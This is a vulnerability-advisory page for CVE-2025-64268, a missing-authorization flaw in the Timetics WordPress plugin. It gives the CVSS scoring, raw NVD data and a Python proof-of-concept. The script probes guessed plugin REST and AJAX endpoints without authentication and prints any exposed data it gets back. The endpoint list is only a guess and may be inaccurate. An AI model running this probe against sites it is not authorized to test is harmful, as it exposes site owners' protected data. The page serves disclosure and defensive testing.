Security Vulnerability Report
中文
CVE-2025-64268 CVSS 7.5 HIGH

CVE-2025-64268

Published: 2025-12-18 08:16:13
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in Arraytics Timetics timetics allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Timetics: from n/a through <= 1.0.44.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Timetics <= 1.0.44

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-64268 PoC - Timetics Plugin Authorization Bypass # Target: WordPress site with Timetics plugin <= 1.0.44 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-64268 Missing Authorization in Timetics plugin """ # Common Timetics API endpoints that may be affected endpoints = [ '/wp-json/timetics/v1/', '/wp-json/timetics/v1/reports', '/wp-json/timetics/v1/projects', '/wp-json/timetics/v1/time-entries', '/wp-admin/admin-ajax.php?action=timetics_get_data' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-64268 - Timetics Authorization Bypass\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send request without authentication response = requests.get(url, timeout=10, verify=False) # Check if we can access protected data without auth if response.status_code == 200: print(f"[+] VULNERABLE: {url}") print(f" Status: {response.status_code}") print(f" Response length: {len(response.text)} bytes") if len(response.text) > 100: print(f" Sample: {response.text[:200]}...") elif response.status_code == 401: print(f"[-] Protected: {url} (401 Unauthorized)") else: print(f"[*] Response: {url} ({response.status_code})") except requests.exceptions.RequestException as e: print(f"[!] Error testing {url}: {e}") print("\n[*] PoC complete. If any endpoint shows VULNERABLE, the site is affected.") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-64268_poc.py <target_url>") print("Example: python cve-2025-64268_poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64268", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:13.333", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Arraytics Timetics timetics allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Timetics: from n/a through <= 1.0.44."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/timetics/vulnerability/wordpress-timetics-plugin-1-0-44-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}